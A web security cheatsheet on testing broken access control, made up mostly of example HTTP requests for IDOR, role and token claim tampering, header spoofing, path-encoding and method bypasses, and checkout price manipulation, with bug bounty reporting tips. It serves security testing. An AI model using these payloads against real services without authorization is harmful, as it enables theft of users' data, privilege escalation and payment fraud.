Skip to content
Web Security

Access Control

Broken access control, IDOR, privilege escalation, and authorization bypass

Horizontal Privilege Escalation

IDOR (Insecure Direct Object Reference)

TEXT 
# Numeric ID
GET /api/users/123/profile GET /api/users/124/profile

# UUID (try sequential or guessable)
GET /api/orders/a1b2c3d4... → GET /api/orders/a1b2c3d5...

# Encoded ID
GET /api/users/MTIz (base64: 123) → GET /api/users/MTI0 (124)

# Hashed ID
Look for predictable patterns, weak hashes
MD5(123) → try MD5(124)

Parameter Manipulation

TEXT 
# Body parameter
POST /update-profile
{"user_id": "123"} → {"user_id": "456"}

# Cookie-based
Cookie: user=john → Cookie: user=admin

# Header-based
X-User-ID: 123X-User-ID: 456

Reference Switching

TEXT 
# Multiple parameters
GET /api/account?user=123&account=456
→ Try user=124&account=456
→ Try user=123&account=457

# Different ID types
GET /document?doc_id=100&owner_id=50
→ Change doc_id AND owner_id

Vertical Privilege Escalation

Role Manipulation

TEXT 
# Hidden role parameter
POST /register
{"username": "test", "role": "user"}
→ {"username": "test", "role": "admin"}

# Header-based
X-Role: user → X-Role: admin
X-Admin: false → X-Admin: true

Admin Path Access

TEXT 
# Direct access
/admin
/admin/dashboard
/administrator
/manage
/management
/admin.php
/admin/users
/api/admin/users

# With ID bruteforce
/admin/user/1
/admin/user/2
...

Function-Level Bypass

TEXT 
# Change request method
GET /admin/delete-userBlocked
POST /admin/delete-userAllowed?

# Add parameters
GET /admin403
GET /admin?debug=1200?
GET /admin?admin=true200?

BOLA (Broken Object Level Authorization)

API Testing

TEXT 
# Get your own resource
GET /api/v1/users/YOUR_ID/orders/1001

# Access other user's resource
GET /api/v1/users/OTHER_ID/orders/1001
GET /api/v1/users/YOUR_ID/orders/1002  # Other user's order

GraphQL BOLA

GRAPHQL 
# Query other user's data
query {
  user(id: "OTHER_USER_ID") {
    email
    orders {
      id
      total
    }
  }
}

BFLA (Broken Function Level Authorization)

Admin Function Access

TEXT 
# Regular endpoint
GET /api/v1/users/123

# Admin function
DELETE /api/v1/users/123
PUT /api/v1/users/123/role {"role": "admin"}
POST /api/v1/users/123/reset-password

API Version Switching

TEXT 
# Newer version may have restrictions
GET /api/v2/admin/users → 403

# Try older version
GET /api/v1/admin/users → 200
GET /api/admin/users → 200

Bypass Techniques

URL Manipulation

TEXT 
# Case variation
/admin → 403
/Admin → 200?
/ADMIN → 200?
/aDmIn → 200?

# Path traversal
/user/profile → allowed
/admin/../user/profile → allowed (reveals admin)
/./admin → 200?
//admin → 200?

# Encoded
/admin → 403
/%61dmin → 200?
/admin%00 → 200?
/admin%20 → 200?
/admin%09 → 200?

HTTP Method Bypass

TEXT 
# Method override headers
X-HTTP-Method-Override: DELETE
X-Method-Override: PUT
X-HTTP-Method: PATCH

# Method switching
GET /admin/delete → 403
POST /admin/delete → 200?
PUT /admin/delete → 200?
TRACE /admin/delete → 200?

Header Manipulation

TEXT 
# IP spoofing
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1

# Custom headers
X-Custom-IP-Authorization: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin

Referer Check Bypass

TEXT 
Referer: https://target.com/admin
Referer: https://target.com/allowed-page
# Remove Referer header entirely

Multi-Step Process Attacks

Skip Steps

TEXT 
# Normal flow
Step 1: /checkout/address → Step 2: /checkout/payment → Step 3: /checkout/confirm

# Skip to
/checkout/confirm (skip payment)
/checkout/complete?order_id=123

Parameter Modification Mid-Flow

TEXT 
# Step 1: Select item
POST /cart/add {"item_id": 1, "price": 100}

# Step 2: Checkout (modify price)
POST /checkout {"item_id": 1, "price": 1}

JWT/Token Attacks

Token Substitution

TEXT 
# Steal/generate token for user A
# Use for user B's resources
Authorization: Bearer <token_user_a>
GET /api/users/B/profile

Claims Manipulation

JSON 
// Original
{"user_id": "123", "role": "user"}

// Modified
{"user_id": "456", "role": "admin"}

Testing Checklist

Horizontal Access

TEXT 
□ Change user ID in URLs
□ Change user ID in request body
□ Change user ID in cookies
□ Test GUID/UUID prediction
□ Test encoded/hashed IDs
□ Test numeric ID increment/decrement

Vertical Access

TEXT 
□ Access admin paths directly
□ Add role parameter to requests
□ Try HTTP method switchingTest API version downgradeAccess admin functions as regular userModify role-based claims in tokens

General

TEXT 
Test with unauthenticated requests
□ Test with different user sessions
□ Try URL encoding bypasses
□ Try header-based bypasses
□ Test multi-step workflow skipping

Bug Bounty Tips

High-Value Targets

TEXT 
- User profile/settings endpoints
- Order/transaction history
- Admin panels and dashboards
- API endpoints with ID parameters
- File download/view endpoints
- Report/export generation

Impact Demonstration

TEXT 
1. Access other user's PII
2. Modify other user's data
3. Escalate to admin
4. Access paid features free
5. Delete other user's resources

Reporting

TEXT 
- Show specific IDOR with two accounts
- Demonstrate data accessed
- Calculate scope (how many users affected)
- Show privilege level difference
Back to Cheatsheets
On this page